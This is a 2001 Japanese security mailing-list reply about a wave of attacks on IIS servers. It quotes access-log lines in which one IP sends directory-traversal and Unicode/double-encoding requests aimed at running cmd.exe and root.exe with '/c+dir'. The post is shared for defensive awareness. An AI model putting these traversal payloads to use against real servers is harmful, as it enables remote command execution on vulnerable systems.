[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[stalk:00895] Re: IIS への攻撃
- To: security-talk@xxxxxxxxxxxxxxxxxxxx
- Subject: [stalk:00895] Re: IIS への攻撃
- From: minz@xxxxxxxx (Hiroshi Migimatsu ^^;)
- Date: 18 Sep 2001 15:00:01 -0000
| > 皆さんのところはどうでしょう?
| 複数のIPアドレスから来てます。1つのアドレスからは連続した
| シーケンスで来ます。
ですね。連続していろいろなパターンの攻撃を仕掛けてきています。
ちなみに、ログはこんなカンジです:
111.222.333.444 - - [18/Sep/2001:23:55:19 +0900] "GET /scripts/root.exe?/c+dir H
TTP/1.0" 404 283
111.222.333.444 - - [18/Sep/2001:23:55:20 +0900] "GET /MSADC/root.exe?/c+dir HTT
P/1.0" 404 281
111.222.333.444 - - [18/Sep/2001:23:55:20 +0900] "GET /c/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 291
111.222.333.444 - - [18/Sep/2001:23:55:21 +0900] "GET /d/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 291
111.222.333.444 - - [18/Sep/2001:23:55:22 +0900] "GET /scripts/..%255c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 305
111.222.333.444 - - [18/Sep/2001:23:55:23 +0900] "GET /_vti_bin/..%255c../..%255
c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
111.222.333.444 - - [18/Sep/2001:23:55:26 +0900] "GET /_mem_bin/..%255c../..%255
c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
111.222.333.444 - - [18/Sep/2001:23:55:30 +0900] "GET /msadc/..%255c../..%255c..
/..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
" 404 338
111.222.333.444 - - [18/Sep/2001:23:55:34 +0900] "GET /scripts/..%c1%1c../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 304
111.222.333.444 - - [18/Sep/2001:23:55:37 +0900] "GET /scripts/..%c0%2f../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 304
111.222.333.444 - - [18/Sep/2001:23:55:38 +0900] "GET /scripts/..%c0%af../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 304
111.222.333.444 - - [18/Sep/2001:23:55:41 +0900] "GET /scripts/..%c1%9c../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 304
111.222.333.444 - - [18/Sep/2001:23:55:45 +0900] "GET /scripts/..%%35%63../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
111.222.333.444 - - [18/Sep/2001:23:56:07 +0900] "GET /scripts/..%%35c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 400 288
111.222.333.444 - - [18/Sep/2001:23:56:09 +0900] "GET /scripts/..%25%35%63../win
nt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
111.222.333.444 - - [18/Sep/2001:23:56:19 +0900] "GET /scripts/..%252f../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 305
--
右松 浩 - mailto:minz@xxxxxxxx - http://www.minz.org/ - みんつ
--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
ニュース速報! はインフォシークで!!
http://www.infoseek.co.jp/Home?pg=Home.html&svx=971122